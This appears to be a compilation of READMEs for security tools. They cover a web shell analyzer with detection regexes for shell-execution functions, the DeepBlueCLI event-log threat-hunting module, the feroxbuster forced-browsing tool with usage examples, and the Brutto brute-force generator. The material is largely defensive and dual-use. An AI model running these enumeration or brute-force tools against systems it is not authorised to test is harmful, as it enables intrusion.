Looking at the block above, we first have the name of the function, the regex used to match, the data-capture regex (sometimes you may want to tweak what is captured versus what is matched), and the PreDecodeActions. In this case, BEFORE the function cm.DecodeBase64 is applied to the matching text, the system first strips the characters " and '. PostDecodeActions works in the opposite direction: the output is checked AFTER decoding is performed. Using this model, we can build multiple custom decoders with any number of PRE/POST and decoding functions to handle most web shell analysis needs.
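For illustration, the PRE-decode flow described above can be sketched in Python. This is a hypothetical, simplified stand-in for the Go analyzer, not its actual code: match a `base64_decode()` call, strip the quote characters (the PreDecodeActions), decode, and hand the result back for re-scanning.

```python
import base64
import re

# Hypothetical sketch of the analyzer's PRE-decode flow: match a
# base64_decode() call, capture its argument, strip quote characters
# (the PreDecodeActions), then base64-decode it for re-scanning.
MATCH = re.compile(r"(?i)base64_decode\(\s*['\"]?([A-Za-z0-9+/=]+)['\"]?\s*\)")

def pre_decode(content: str) -> list[str]:
    decoded_layers = []
    for captured in MATCH.findall(content):
        # PreDecodeActions: remove " and ' before decoding
        cleaned = captured.replace('"', '').replace("'", '')
        decoded_layers.append(base64.b64decode(cleaned).decode('utf-8', 'replace'))
    return decoded_layers

shell = "<?php eval(base64_decode('cGhwaW5mbygpOw==')); ?>"
print(pre_decode(shell))  # ['phpinfo();'] -- fed back into the scan loop
```

Each decoded layer would be re-submitted to the engine, which is how nested obfuscation (base64 inside base64, etc.) gets peeled away.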


Detections

A detection is a regex accompanied by a name and description. The idea behind this model was to make detections modular and scalable while keeping context with the actual detection. Detections share the same format as attributes, except that attributes cannot generate a detection; they can only add context to an existing one. Let's look at the example detection logic block below:

{
    Name:        "Generic_Embedded_Executable",
    Description: "Looks for magic bytes associated with a PE file",
    Regex:       *regexp.MustCompile(`(?i)(?:(?:0x)?4d5a)`),
},

Based on the regex, we can see it's looking for an embedded Windows PE file, based on the magic header bytes 4D 5A. If found, this leads to a detection and a JSON report is generated for the file. Currently, detections are applied based on file extension or generically to all file types. For example, decoding routines for PHP are defined under cm.GlobalMap.Function_Php and tags for attributes are defined under cm.GlobalMap.Tags_Php. The functions under cm.GlobalMap.Function_Generics and tags under cm.GlobalMap.Tags_Generics apply to ALL web shell extensions as a catch-all.
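As a rough illustration (in Python rather than the analyzer's Go), the same magic-byte detection amounts to a case-insensitive search for the hex-encoded PE header, with or without a 0x prefix:

```python
import re

# Illustrative sketch of the Generic_Embedded_Executable detection:
# flag content containing the PE magic bytes "MZ" (0x4D 0x5A) written
# out as hex, optionally prefixed with "0x".
PE_MAGIC = re.compile(r"(?i)(?:0x)?4d5a")

def detect_embedded_pe(content: str) -> bool:
    return bool(PE_MAGIC.search(content))

print(detect_embedded_pe("$bytes = '0x4D5A90000300';"))  # True
print(detect_embedded_pe("echo 'hello';"))               # False
```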


Attributes

Attribute tagging is a new concept I created that adds "context" to an existing web shell detection. Attributes alone cannot currently generate a detection on their own. A traditional scan engine would only alert that a web shell was detected, providing little to no additional context about what capabilities (attributes) the web shell potentially has. Attribute tags use the same logic as detections; however, they are only shown after a detection has been identified. Looking at the example logic below:

cm.GlobalMap.Tags_Php = []cm.TagDef{
    {
        Name:        "PHP_Database_Operations",
        Description: "Looks for common PHP functions used for interacting with a database.",
        Regex:       *regexp.MustCompile(`(?i)(?:'mssql_connect\|mysql_exec\()`),
        Attribute:   true,
    },
}

We see that under the struct Tags_Php, we have created a new PHP tag. When a match is found during scanning, the Attribute flag is checked and if set to True, the detected web shell will have the tag PHP_Database_Operations appended to its JSON report along with the frequency and matching text block, as shown in the example output below:

{
    "filePath": "/testers/1.php",
    "size": 66109,
    "md5": "6793d8ebab93e5a0f91e5a331221f331",
    "timestamps": {
        "birth": "2019-02-03 02:02:22",
        "created": "2020-07-29 02:50:15",
        "modified": "2019-02-03 02:02:22",
        "accessed": "2020-07-29 02:51:07"
    },
    "matches": {
        "FilesMAn": 5,
        "FilesMan": 29,
        "cmd": 20,
        "eval(": 4,
        "exec(": 2,
        "ipconfig": 1,
        "netstat": 2,
        "passthru(": 1,
        "shell_exec(": 1
    },
    "decodes": {
        "Generic_Base64Decode": 40,
        "Generic_Multiline_Base64Decode": 165
    },
    "tags": {
        "Generic_Embedding_Code_C": {
            "bind(": 2,
            "listen(": 2
        },
        "PHP_Banned_Function": {
            "exec(": 3,
            "get_current_user(": 1,
            "getmyuid(": 1,
            "link(": 7,
            "listen(": 2,
            "passthru(": 1,
            "realpath(": 1,
            "set_time_limit(": 1
        },
        "PHP_Database_Operations": {
            "mysql_query(": 1
        },
        "PHP_Disk_Operations": {
            "@chmod(": 1,
            "@filegroup(": 4,
            "@fileowner(": 4,
            "@rename(": 2,
            "fopen(": 7,
            "fwrite(": 6
        }
    }
}

These tags not only help define what a web shell can do; they also give teams, such as IR consultants performing live-response engagements, a pivot point for where to look next.


Requirements

None! Simply download the binary for your OS, supply the directory you wish to scan (other arguments are optional) and let it rip.


Running the binary

Running wsa with no arguments shows the following options:

/Users/beastmode$ ./wsa
Options:
  -dir string
        Directory to scan for web shells
  -raw_contents
        If a match is found, grab the raw contents and base64 + gzip compress the file into the JSON object.
  -size int
        Specify max file size to scan in MB (default 10)
  -verbose bool
        If set to true, the analyzer will print all files analyzed, not just matches

The only required argument is dir. You can override the other program defaults if you wish.

The output of the analyzer will be written to the console (standard output). Example below (for best results, send stdout to a JSON file and review/post-process offline):

Linux: ./wsa -dir /opt/www
Windows: wsa.exe -dir C:\Inetpub\wwwroot

### With STDOUT and full web shell file encoded and compressed:
Linux: ./wsa -dir /opt/www -raw_contents=true > scan_results.json

Once the analyzer finishes, it will output the overall scan metrics to STDOUT, as shown in the example below:

{"scanned":311,"matches":122,"noMatches":189,"directory":"/webshell-master/php","scanDuration":1.4757737378333333,"systemInfo":{"hostname":"Beast","envVars":[""],"username":"beastmode","userID":"501","realName":"The Beast","userHomeDir":"/Users/beastmode"}}


Building the project from source

If you decide to modify the source code, you can build the project using the following commands:

cd <path-to-project>

## Windows
GOOS=windows GOARCH=386 go build -o wsa32.exe main.go
GOOS=windows GOARCH=amd64 go build -o wsa64.exe main.go

## Linux
GOOS=linux GOARCH=amd64 go build -o wsa_linux64 main.go

## Darwin
GOOS=darwin GOARCH=amd64 go build -o wsa_darwin64 main.go


DeepBlueCLI - a PowerShell Module for Threat Hunting via Windows Event Logs



DeepBlueCLI - a PowerShell Module for Threat Hunting via Windows Event Logs

Eric Conrad, Backshore Communications, LLC

deepblue at backshore dot net

Twitter: @eric_conrad

http://ericconrad.com

Sample evtx files are in the .\evtx directory


Usage:

.\DeepBlue.ps1 <event log name> <evtx filename>

See the Set-ExecutionPolicy Readme if you receive a 'running scripts is disabled on this system' error.


Process local Windows security event log (PowerShell must be run as Administrator):

.\DeepBlue.ps1

or:

.\DeepBlue.ps1 -log security


Process local Windows system event log:

.\DeepBlue.ps1 -log system


Process evtx file:

.\DeepBlue.ps1 .\evtx\new-user-security.evtx


Windows Event Logs processed
  • Windows Security
  • Windows System
  • Windows Application
  • Windows PowerShell
  • Sysmon

Command Line Logs processed

See Logging setup section below for how to configure these logs

  • Windows Security event ID 4688
  • Windows PowerShell event IDs 4103 and 4104
  • Sysmon event ID 1

Detected events
  • Suspicious account behavior
    • User creation
    • User added to local/global/universal groups
    • Password guessing (multiple logon failures, one account)
    • Password spraying via failed logon (multiple logon failures, multiple accounts)
    • Password spraying via explicit credentials
    • Bloodhound (admin privileges assigned to the same account with multiple Security IDs)
  • Command line/Sysmon/PowerShell auditing
    • Long command lines
    • Regex searches
    • Obfuscated commands
    • PowerShell launched via WMIC or PsExec
    • PowerShell Net.WebClient Downloadstring
    • Compressed/Base64 encoded commands (with automatic decompression/decoding)
    • Unsigned EXEs or DLLs
  • Service auditing
    • Suspicious service creation
    • Service creation errors
    • Stopping/starting the Windows Event Log service (potential event log manipulation)
  • Mimikatz
    • lsadump::sam
  • EMET & Applocker Blocks

...and more
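A side note on the "Compressed/Base64 encoded commands" detection above: PowerShell's -EncodedCommand argument is base64 over UTF-16LE text, so reversing it takes two steps. A minimal Python illustration of the idea (DeepBlueCLI itself is PowerShell; this is not its actual code):

```python
import base64

# PowerShell's -EncodedCommand is base64(UTF-16LE(command)), so
# decoding a suspicious command line is a two-step reversal.
def decode_powershell_enc(b64: str) -> str:
    return base64.b64decode(b64).decode('utf-16-le')

# Build a sample the way an attacker would, then decode it back.
cmd = "IEX (New-Object Net.WebClient).DownloadString('http://example/a.ps1')"
encoded = base64.b64encode(cmd.encode('utf-16-le')).decode()
print(decode_powershell_enc(encoded))
```

DeepBlueCLI performs this decoding (plus decompression) automatically before running its detections over the recovered command.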


Examples
Event                                     Command
Event log manipulation                    .\DeepBlue.ps1 .\evtx\disablestop-eventlog.evtx
Metasploit native target (security)       .\DeepBlue.ps1 .\evtx\metasploit-psexec-native-target-security.evtx
Metasploit native target (system)         .\DeepBlue.ps1 .\evtx\metasploit-psexec-native-target-system.evtx
Metasploit PowerShell target (security)   .\DeepBlue.ps1 .\evtx\metasploit-psexec-powershell-target-security.evtx
Metasploit PowerShell target (system)     .\DeepBlue.ps1 .\evtx\metasploit-psexec-powershell-target-system.evtx
Mimikatz lsadump::sam                     .\DeepBlue.ps1 .\evtx\mimikatz-privesc-hashdump.evtx
New user creation                         .\DeepBlue.ps1 .\evtx\new-user-security.evtx
Obfuscation (encoding)                    .\DeepBlue.ps1 .\evtx\Powershell-Invoke-Obfuscation-encoding-menu.evtx
Obfuscation (string)                      .\DeepBlue.ps1 .\evtx\Powershell-Invoke-Obfuscation-string-menu.evtx
Password guessing                         .\DeepBlue.ps1 .\evtx\smb-password-guessing-security.evtx
Password spraying                         .\DeepBlue.ps1 .\evtx\password-spray.evtx
PowerSploit (security)                    .\DeepBlue.ps1 .\evtx\powersploit-security.evtx
PowerSploit (system)                      .\DeepBlue.ps1 .\evtx\powersploit-system.evtx
PSAttack                                  .\DeepBlue.ps1 .\evtx\psattack-security.evtx
User added to administrator group         .\DeepBlue.ps1 .\evtx\new-user-security.evtx

Output

DeepBlueCLI outputs in PowerShell objects, allowing a variety of output methods and types, including JSON, HTML, CSV, etc.

For example:

Output Type             Syntax
CSV                     .\DeepBlue.ps1 .\evtx\psattack-security.evtx | ConvertTo-Csv
Format list (default)   .\DeepBlue.ps1 .\evtx\psattack-security.evtx | Format-List
Format table            .\DeepBlue.ps1 .\evtx\psattack-security.evtx | Format-Table
GridView                .\DeepBlue.ps1 .\evtx\psattack-security.evtx | Out-GridView
HTML                    .\DeepBlue.ps1 .\evtx\psattack-security.evtx | ConvertTo-Html
JSON                    .\DeepBlue.ps1 .\evtx\psattack-security.evtx | ConvertTo-Json
XML                     .\DeepBlue.ps1 .\evtx\psattack-security.evtx | ConvertTo-Xml

Logging setup

Security event 4688 (Command line auditing):

Enable Windows command-line auditing: https://support.microsoft.com/en-us/kb/3004375


Security event 4625 (Failed logons):

Requires auditing logon failures: https://technet.microsoft.com/en-us/library/cc976395.aspx


PowerShell auditing (PowerShell 5.0):

DeepBlueCLI uses module logging (PowerShell event 4103) and script block logging (4104). It does not use transcription.

See: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html

To get the PowerShell commandline (and not just script block) on Windows 7 through Windows 8.1, add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1

$LogCommandHealthEvent = $true
$LogCommandLifecycleEvent = $true

See the following for more information:

Thank you: @heinzarelli and @HackerHurricane


Sysmon

Install Sysmon from Sysinternals: https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon

DeepBlue and DeepWhite currently use Sysmon events 1, 6, and 7.

Configure Sysmon to log SHA256 hashes. Logging other hash types alongside is fine; DeepBlueCLI will use the SHA256 value.



Feroxbuster - A Fast, Simple, Recursive Content Discovery Tool Written In Rust



What the heck is a ferox anyway?

Ferox is short for Ferric Oxide. Ferric Oxide, simply put, is rust. The name rustbuster was taken, so I decided on a variation.


What's it do tho?

feroxbuster is a tool designed to perform Forced Browsing.

Forced browsing is an attack where the aim is to enumerate and access resources that are not referenced by the web application, but are still accessible by an attacker.

feroxbuster uses brute force combined with a wordlist to search for unlinked content in target directories. These resources may store sensitive information about web applications and operational systems, such as source code, credentials, internal network addressing, etc...

This attack is also known as Predictable Resource Location, File Enumeration, Directory Enumeration, and Resource Enumeration.

Installation


Download a Release

Releases for multiple architectures can be found in the Releases section. The latest release for each of the following systems can be downloaded and executed as shown below.


Linux x86
curl -sLO https://github.com/epi052/feroxbuster/releases/latest/download/x86-linux-feroxbuster.zip
unzip x86-linux-feroxbuster.zip
chmod +x ./feroxbuster
./feroxbuster -V

Linux x86_64
curl -sLO https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-linux-feroxbuster.zip
unzip x86_64-linux-feroxbuster.zip
chmod +x ./feroxbuster
./feroxbuster -V

MacOS x86_64
curl -sLO https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-macos-feroxbuster.zip
unzip x86_64-macos-feroxbuster.zip
chmod +x ./feroxbuster
./feroxbuster -V

Windows x86
Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip
Expand-Archive .\feroxbuster.zip
.\feroxbuster\feroxbuster.exe -V

Windows x86_64
Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip
Expand-Archive .\feroxbuster.zip
.\feroxbuster\feroxbuster.exe -V

Homebrew on MacOS and Linux

Installable via Homebrew through its own taps:

MacOS
brew tap tgotwig/feroxbuster
brew install feroxbuster

Linux
brew tap tgotwig/linux-feroxbuster
brew install feroxbuster

Cargo Install

feroxbuster is published on crates.io, making it easy to install if you already have rust installed on your system.

cargo install feroxbuster

apt Install

Download feroxbuster_amd64.deb from the Releases section. After that, use your favorite package manager to install the .deb.

curl -sLO https://github.com/epi052/feroxbuster/releases/latest/download/feroxbuster_amd64.deb.zip
unzip feroxbuster_amd64.deb.zip
sudo apt install ./feroxbuster_amd64.deb

AUR Install

Install feroxbuster-git on Arch Linux with your AUR helper of choice:

yay -S feroxbuster-git

Docker Install

The following steps assume you have docker installed / setup

First, clone the repository.

git clone https://github.com/epi052/feroxbuster.git
cd feroxbuster

Next, build the image.

sudo docker build -t feroxbuster .

After that, you should be able to use docker run to perform scans with feroxbuster.


Basic usage
sudo docker run --init -it feroxbuster -u http://example.com -x js,html

Piping from stdin and proxying all requests through socks5 proxy
cat targets.txt | sudo docker run --net=host --init -i feroxbuster --stdin -x js,html --proxy socks5://127.0.0.1:9050

Mount a volume to pass in ferox-config.toml

You've got some options available if you want to pass in a config file. ferox-config.toml can live in multiple locations and still be valid, so it's up to you how you'd like to pass it in. Below are a few valid examples:

sudo docker run --init -v $(pwd)/ferox-config.toml:/etc/feroxbuster/ferox-config.toml -it feroxbuster -u http://example.com
sudo docker run --init -v ~/.config/feroxbuster:/root/.config/feroxbuster -it feroxbuster -u http://example.com

Note: If you are on a SELinux enforced system, you will need to pass the :Z attribute also.

docker run --init -v $(pwd)/ferox-config.toml:/etc/feroxbuster/ferox-config.toml:Z -it feroxbuster -u http://example.com

Define an alias for simplicity
alias feroxbuster="sudo docker run --init -v ~/.config/feroxbuster:/root/.config/feroxbuster -i feroxbuster"

Configuration

Default Values

Configuration begins with the following built-in default values baked into the binary:

  • timeout: 7 seconds
  • follow redirects: false
  • wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
  • threads: 50
  • verbosity: 0 (no logging enabled)
  • statuscodes: 200 204 301 302 307 308 401 403 405
  • useragent: feroxbuster/VERSION
  • recursion depth: 4
  • auto-filter wildcards: true
  • output: stdout

ferox-config.toml

After setting built-in default values, any values defined in a ferox-config.toml config file will override the built-in defaults.

feroxbuster searches for ferox-config.toml in the following locations (in the order shown):

  • /etc/feroxbuster/ (global)
  • CONFIG_DIR/feroxbuster/ (per-user)
  • The same directory as the feroxbuster executable (per-user)
  • The user's current working directory (per-target)

CONFIG_DIR is defined as the following:

  • Linux: $XDG_CONFIG_HOME or $HOME/.config i.e. /home/bob/.config
  • MacOS: $HOME/Library/Application Support i.e. /Users/bob/Library/Application Support
  • Windows: {FOLDERID_RoamingAppData} i.e. C:\Users\Bob\AppData\Roaming

If more than one valid configuration file is found, each one overwrites the values found previously.

If no configuration file is found, nothing happens at this stage.

As an example, let's say that we prefer to use a different wordlist as our default when scanning; we can set the wordlist value in the config file to override the baked-in default.

Notes of interest:

  • it's ok to only specify values you want to change without specifying anything else
  • variable names in ferox-config.toml must match their command-line counterpart
# ferox-config.toml

wordlist = "/wordlists/jhaddix/all.txt"

A pre-made configuration file with examples of all available settings can be found in ferox-config.toml.example.

# ferox-config.toml
# Example configuration for feroxbuster
#
# If you wish to provide persistent settings to feroxbuster, rename this file to ferox-config.toml and make sure
# it resides in the same directory as the feroxbuster binary.
#
# After that, uncomment any line to override the default value provided by the binary itself.
#
# Any setting used here can be overridden by the corresponding command line option/argument
#
# wordlist = "/wordlists/jhaddix/all.txt"
# statuscodes = [200, 500]
# threads = 1
# timeout = 5
# proxy = "http://127.0.0.1:8080"
# verbosity = 1
# quiet = true
# output = "/targets/ellingson_mineral_company/gibson.txt"
# useragent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
# redirects = true
# insecure = true
# extensions = ["php", "html"]
# norecursion = true
# addslash = true
# stdin = true
# dontfilter = true
# depth = 1
# sizefilters = [5174]
# queries = [["name","value"], ["rick", "astley"]]

# headers can be specified on multiple lines or as an inline table
#
# inline example
# headers = {"stuff" = "things"}
#
# multi-line example
# note: if multi-line is used, all key/value pairs under it belong to the headers table until the next table
# is found or the end of the file is reached
#
# [headers]
# stuff = "things"
# more = "headers"

Command Line Parsing

Finally, after parsing the available config file, any options/arguments given on the commandline will override any values that were set as a built-in or config-file value.
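Putting the three layers together, the precedence logic can be sketched in Python (an illustrative model only; feroxbuster's actual implementation is in Rust):

```python
# Illustrative model of layered precedence: built-in defaults, then
# each config file found (in search order), then command-line
# arguments, with later layers overriding earlier ones.
def resolve_config(defaults, config_files, cli_args):
    resolved = dict(defaults)
    for file_values in config_files:  # /etc -> CONFIG_DIR -> exe dir -> cwd
        resolved.update(file_values)
    resolved.update(cli_args)
    return resolved

final = resolve_config(
    {"threads": 50, "timeout": 7},   # baked-in defaults
    [{"threads": 1}, {"timeout": 5}],  # two config files found
    {"threads": 100},                # command line wins
)
print(final)  # {'threads': 100, 'timeout': 5}
```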

USAGE:
    feroxbuster [FLAGS] [OPTIONS] --url <URL>...

FLAGS:
    -f, --addslash      Append / to each request
    -D, --dontfilter    Don't auto-filter wildcard responses
    -h, --help          Prints help information
    -k, --insecure      Disables TLS certificate validation
    -n, --norecursion   Do not scan recursively
    -q, --quiet         Only print URLs; Don't print status codes, response size, running config, etc...
    -r, --redirects     Follow redirects
        --stdin         Read url(s) from STDIN
    -V, --version       Prints version information
    -v, --verbosity     Increase verbosity level (use -vv or more for greater effect)

OPTIONS:
    -d, --depth <RECURSION_DEPTH>          Maximum recursion depth, a depth of 0 is infinite recursion (default: 4)
    -x, --extensions <FILE_EXTENSION>...   File extension(s) to search for (ex: -x php -x pdf js)
    -H, --headers <HEADER>...              Specify HTTP headers (ex: -H Header:val 'stuff: things')
    -o, --output <FILE>                    Output file to write results to (default: stdout)
    -p, --proxy <PROXY>                    Proxy to use for requests (ex: http(s)://host:port, socks5://host:port)
    -Q, --query <QUERY>...                 Specify URL query parameters (ex: -Q token=stuff -Q secret=key)
    -S, --sizefilter <SIZE>...             Filter out messages of a particular size (ex: -S 5120 -S 4927,1970)
    -s, --statuscodes <STATUS_CODE>...     Status Codes of interest (default: 200 204 301 302 307 308 401 403 405)
    -t, --threads <THREADS>                Number of concurrent threads (default: 50)
    -T, --timeout <SECONDS>                Number of seconds before a request times out (default: 7)
    -u, --url <URL>...                     The target URL(s) (required, unless --stdin used)
    -a, --useragent <USER_AGENT>           Sets the User-Agent (default: feroxbuster/VERSION)
    -w, --wordlist <FILE>                  Path to the wordlist

Example Usage

Multiple Values

Options that take multiple values are very flexible. Consider the following ways of specifying extensions:

./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx

The command above adds .pdf, .js, .html, .php, .txt, .json, and .docx to each url

All of the methods above (multiple flags, space separated, comma separated, etc...) are valid and interchangeable. The same goes for urls, headers, status codes, queries, and size filters.
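A rough Python sketch of how such flexible inputs can be normalized (illustrative only; feroxbuster's actual argument parsing is in Rust and differs in detail):

```python
# Hypothetical normalization of flexible multi-value options: repeated
# flags, space-separated, and comma-separated values all flatten to a
# single list (mirrors the -x example above).
def flatten_values(raw_values):
    flattened = []
    for value in raw_values:
        for token in value.replace(',', ' ').split():
            flattened.append(token)
    return flattened

# e.g. the raw values collected from: -x pdf -x js,html -x php txt json,docx
raw = ["pdf", "js,html", "php txt json,docx"]
print(flatten_values(raw))  # ['pdf', 'js', 'html', 'php', 'txt', 'json', 'docx']
```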


Include Headers
./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}"

IPv6, non-recursive scan with INFO-level logging enabled
./feroxbuster -u http://[::1] --norecursion -vv

Read urls from STDIN; pipe only resulting urls out to another tool
cat targets | ./feroxbuster --stdin --quiet -s 200 301 302 --redirects -x js | fff -s 200 -o js-files

Proxy traffic through Burp
./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080

Proxy traffic through a SOCKS proxy
./feroxbuster -u http://127.1 --proxy socks5://127.0.0.1:9050

Pass auth token via query parameter
./feroxbuster -u http://127.1 --query token=0123456789ABCDEF

Comparison w/ Similar Tools

There are quite a few similar tools for forced browsing/content discovery. Burp Suite Pro, Dirb, Dirbuster, etc... However, in my opinion, there are two that set the standard: gobuster and ffuf. Both are mature, feature-rich, and all-around incredible tools to use.

So, why would you ever want to use feroxbuster over ffuf/gobuster? In most cases, you probably won't. ffuf in particular can do the vast majority of things that feroxbuster can, while still offering boatloads more functionality. Here are a few of the use-cases in which feroxbuster may be a better fit:

  • You want a simple tool usage experience
  • You want to be able to run your content discovery as part of some crazy 12 command unix pipeline extravaganza
  • You want to scan through a SOCKS proxy
  • You want auto-filtering of Wildcard responses by default
  • You want recursion along with some other thing mentioned above (ffuf also does recursion)
  • You want a configuration file option for overriding built-in default values for your scans
Features compared across feroxbuster, gobuster, and ffuf:

  • fast
  • easy to use
  • blacklist status codes (in addition to whitelist)
  • allows recursion
  • can specify query parameters
  • SOCKS proxy support
  • multiple target scan (via stdin or multiple -u)
  • configuration file for default value override
  • can accept urls via STDIN as part of a pipeline
  • can accept wordlists via STDIN
  • filter by response size
  • auto-filter wildcard responses
  • performs other scans (vhost, dns, etc)
  • time delay / rate limiting
  • huge number of other options
Of note, there's another written-in-rust content discovery tool, rustbuster. I came across rustbuster when I was naming my tool. I don't have any experience using it, but it appears to be able to do POST requests with an HTTP body, has SOCKS support, and has an 8.3 shortname scanner (in addition to vhost, dns, directory, etc...). In short, it definitely looks interesting and may be what you're looking for, as it has some capability I haven't seen in similar tools.

Brutto - Easy Brute Forcing To Whatever You Want



Easy brute forcing for whatever you want, with incremental (increase) and direct modes.


Implementation
# So you import the library
from brutto_easy import Brutto

How to use
  • Includes all letters (A-Z, a-z), case sensitive.
  • All numbers (0-9) are included in the process.
  • Also all symbols and the space character.

Settings
  • scope
  • letters
  • numbers
  • symbols
  • space

Base
  • increase
  • direct

Default settings test with (increase)
# call brutto
test = Brutto()

# Here I implement
for example in test.increase(letters=True, numbers=True, symbols=False, space=False, scope=4):
    print(example)

Default settings test with (direct)
# call brutto
bruteforce = Brutto()

for example in bruteforce.direct(4):
    print(example)

So you add a custom value to increase letters. scope=(1-5)

# call brutto
test = Brutto()

for example in test.increase(letters=True, scope=5):
    print(example)

With letters and numbers, and increased scope=(1-8 )

# call brutto
test = Brutto()

for example in test.increase(scope=8, letters=True, numbers=True, symbols=False):
    print(example)
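The increase mode is essentially an exhaustive walk over every string from length 1 up to scope over the chosen character set. A hypothetical re-implementation using itertools (not Brutto's actual code):

```python
import itertools
import string

# Hypothetical re-implementation of the "increase" mode: yield every
# candidate of length 1 up to `scope` over the selected character set.
def increase(letters=True, numbers=False, scope=2):
    charset = ""
    if letters:
        charset += string.ascii_letters  # a-z and A-Z
    if numbers:
        charset += string.digits         # 0-9
    for length in range(1, scope + 1):
        for combo in itertools.product(charset, repeat=length):
            yield "".join(combo)

candidates = list(increase(letters=False, numbers=True, scope=2))
print(candidates[:12])  # ['0', '1', ..., '9', '00', '01']
```

Note how quickly the search space grows: with 62 alphanumeric characters and scope=8, the generator would yield over 200 trillion candidates, which is why narrowing the character set and scope matters.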


Copyright, 2015 by Jose Pino


